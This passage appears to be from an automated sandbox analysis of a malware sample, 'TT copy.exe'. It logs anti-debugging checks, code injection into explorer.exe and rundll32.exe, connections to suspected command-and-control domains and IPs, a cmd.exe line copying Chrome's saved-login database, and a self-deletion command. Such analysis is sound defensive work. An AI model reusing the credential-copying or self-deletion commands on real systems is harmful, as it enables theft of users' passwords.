            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107849B mov eax, dword ptr fs:[00000030h]3_2_0107849B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01138CD6 mov eax, dword ptr fs:[00000030h]3_2_01138CD6
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011214FB mov eax, dword ptr fs:[00000030h]3_2_011214FB
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6CF0 mov eax, dword ptr fs:[00000030h]3_2_010E6CF0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6CF0 mov eax, dword ptr fs:[00000030h]3_2_010E6CF0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6CF0 mov eax, dword ptr fs:[00000030h]3_2_010E6CF0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109A70E mov eax, dword ptr fs:[00000030h]3_2_0109A70E
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109A70E mov eax, dword ptr fs:[00000030h]3_2_0109A70E
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0113070D mov eax, dword ptr fs:[00000030h]3_2_0113070D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0113070D mov eax, dword ptr fs:[00000030h]3_2_0113070D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108F716 mov eax, dword ptr fs:[00000030h]3_2_0108F716
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FFF10 mov eax, dword ptr fs:[00000030h]3_2_010FFF10
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FFF10 mov eax, dword ptr fs:[00000030h]3_2_010FFF10
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01064F2E mov eax, dword ptr fs:[00000030h]3_2_01064F2E
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01064F2E mov eax, dword ptr fs:[00000030h]3_2_01064F2E
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B73D mov eax, dword ptr fs:[00000030h]3_2_0108B73D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B73D mov eax, dword ptr fs:[00000030h]3_2_0108B73D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109E730 mov eax, dword ptr fs:[00000030h]3_2_0109E730
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107EF40 mov eax, dword ptr fs:[00000030h]3_2_0107EF40
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107FF60 mov eax, dword ptr fs:[00000030h]3_2_0107FF60
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01138F6A mov eax, dword ptr fs:[00000030h]3_2_01138F6A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01078794 mov eax, dword ptr fs:[00000030h]3_2_01078794
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E7794 mov eax, dword ptr fs:[00000030h]3_2_010E7794
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E7794 mov eax, dword ptr fs:[00000030h]3_2_010E7794
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E7794 mov eax, dword ptr fs:[00000030h]3_2_010E7794
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A37F5 mov eax, dword ptr fs:[00000030h]3_2_010A37F5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106C600 mov eax, dword ptr fs:[00000030h]3_2_0106C600
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106C600 mov eax, dword ptr fs:[00000030h]3_2_0106C600
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106C600 mov eax, dword ptr fs:[00000030h]3_2_0106C600
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01098E00 mov eax, dword ptr fs:[00000030h]3_2_01098E00
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109A61C mov eax, dword ptr fs:[00000030h]3_2_0109A61C
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109A61C mov eax, dword ptr fs:[00000030h]3_2_0109A61C
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121608 mov eax, dword ptr fs:[00000030h]3_2_01121608
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106E620 mov eax, dword ptr fs:[00000030h]3_2_0106E620
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0111FE3F mov eax, dword ptr fs:[00000030h]3_2_0111FE3F
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01077E41 mov eax, dword ptr fs:[00000030h]3_2_01077E41
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01077E41 mov eax, dword ptr fs:[00000030h]3_2_01077E41
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01077E41 mov eax, dword ptr fs:[00000030h]3_2_01077E41
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01077E41 mov eax, dword ptr fs:[00000030h]3_2_01077E41
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01077E41 mov eax, dword ptr fs:[00000030h]3_2_01077E41
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01077E41 mov eax, dword ptr fs:[00000030h]3_2_01077E41
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112AE44 mov eax, dword ptr fs:[00000030h]3_2_0112AE44
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112AE44 mov eax, dword ptr fs:[00000030h]3_2_0112AE44
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107766D mov eax, dword ptr fs:[00000030h]3_2_0107766D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108AE73 mov eax, dword ptr fs:[00000030h]3_2_0108AE73
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108AE73 mov eax, dword ptr fs:[00000030h]3_2_0108AE73
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108AE73 mov eax, dword ptr fs:[00000030h]3_2_0108AE73
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108AE73 mov eax, dword ptr fs:[00000030h]3_2_0108AE73
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108AE73 mov eax, dword ptr fs:[00000030h]3_2_0108AE73
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FFE87 mov eax, dword ptr fs:[00000030h]3_2_010FFE87
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E46A7 mov eax, dword ptr fs:[00000030h]3_2_010E46A7
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01130EA5 mov eax, dword ptr fs:[00000030h]3_2_01130EA5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01130EA5 mov eax, dword ptr fs:[00000030h]3_2_01130EA5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01130EA5 mov eax, dword ptr fs:[00000030h]3_2_01130EA5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01138ED6 mov eax, dword ptr fs:[00000030h]3_2_01138ED6
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010936CC mov eax, dword ptr fs:[00000030h]3_2_010936CC
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A8EC7 mov eax, dword ptr fs:[00000030h]3_2_010A8EC7
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0111FEC0 mov eax, dword ptr fs:[00000030h]3_2_0111FEC0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010776E2 mov eax, dword ptr fs:[00000030h]3_2_010776E2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010916E0 mov ecx, dword ptr fs:[00000030h]3_2_010916E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0523C450 mov eax, dword ptr fs:[00000030h]15_2_0523C450
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0523C450 mov eax, dword ptr fs:[00000030h]15_2_0523C450
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B849B mov eax, dword ptr fs:[00000030h]15_2_051B849B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226CF0 mov eax, dword ptr fs:[00000030h]15_2_05226CF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226CF0 mov eax, dword ptr fs:[00000030h]15_2_05226CF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226CF0 mov eax, dword ptr fs:[00000030h]15_2_05226CF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_052614FB mov eax, dword ptr fs:[00000030h]15_2_052614FB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05278CD6 mov eax, dword ptr fs:[00000030h]15_2_05278CD6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051CF716 mov eax, dword ptr fs:[00000030h]15_2_051CF716
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DA70E mov eax, dword ptr fs:[00000030h]15_2_051DA70E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DA70E mov eax, dword ptr fs:[00000030h]15_2_051DA70E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051CB73D mov eax, dword ptr fs:[00000030h]15_2_051CB73D
            Source: C:\Users\user\Desktop\TT copy.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\rundll32.exe; Process queried: DebugPort
            Source: C:\Users\user\Desktop\TT copy.exe; Code function: 3_2_0040A150 LdrLoadDll, 3_2_0040A150
            Source: C:\Users\user\Desktop\TT copy.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\explorer.exe; Network Connect: 107.187.232.173 80
            Source: C:\Windows\explorer.exe; Domain query: www.huiyi-sui.com
            Source: C:\Windows\explorer.exe; Domain query: www.sarrafguler.com
            Source: C:\Windows\explorer.exe; Network Connect: 23.227.38.74 80
            Source: C:\Windows\explorer.exe; Network Connect: 18.193.36.153 80
            Source: C:\Windows\explorer.exe; Network Connect: 66.96.162.130 80
            Source: C:\Windows\explorer.exe; Network Connect: 198.44.241.20 80
            Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 172.16.0.13 80
            Source: C:\Windows\explorer.exe; Network Connect: 154.36.145.110 80
            Source: C:\Windows\explorer.exe; Domain query: www.pheife.com
            Source: C:\Windows\explorer.exe; Domain query: www.sassafrasriver.info
            Source: C:\Windows\explorer.exe; Network Connect: 185.254.241.173 80
            Source: C:\Windows\explorer.exe; Domain query: www.drivetrianrepair.com
            Source: C:\Windows\explorer.exe; Domain query: www.theflysnare.com
            Source: C:\Windows\explorer.exe; Network Connect: 162.213.255.237 80
            Source: C:\Windows\explorer.exe; Domain query: www.408wmountain.info
            Source: C:\Windows\explorer.exe; Domain query: www.shopcycles3.com
            Source: C:\Windows\explorer.exe; Domain query: www.sinsegae.net
            Source: C:\Windows\explorer.exe; Domain query: www.huayugw.com
            Source: C:\Users\user\Desktop\TT copy.exe; Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: FC0000
            Source: C:\Users\user\Desktop\TT copy.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\TT copy.exe; Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rundll32.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\rundll32.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rundll32.exe; Section loaded: unknown target: unknown protection: read write
            Source: C:\Users\user\Desktop\TT copy.exe; Memory written: C:\Users\user\Desktop\TT copy.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\TT copy.exe; Thread APC queued: target process: C:\Windows\explorer.exe
            Source: C:\Users\user\Desktop\TT copy.exe; Thread register set: target process: 3616
            Source: C:\Windows\SysWOW64\rundll32.exe; Thread register set: target process: 3616
            Source: C:\Users\user\Desktop\TT copy.exe; Process created: C:\Users\user\Desktop\TT copy.exe C:\Users\user\Desktop\TT copy.exe
            Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT copy.exe"
            Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: explorer.exe, 00000007.00000000.409321341.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.289551295.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.334016110.0000000005E60000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.401387275.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.289551295.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.326475349.00000000005C8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.289551295.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.326911519.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.401717230.0000000000B50000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager,
            Source: explorer.exe, 00000007.00000000.289551295.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.326911519.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.401717230.0000000000B50000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\TT copy.exe; Queries volume information: C:\Users\user\Desktop\TT copy.exe VolumeInformation
            Source: C:\Users\user\Desktop\TT copy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\TT copy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\TT copy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
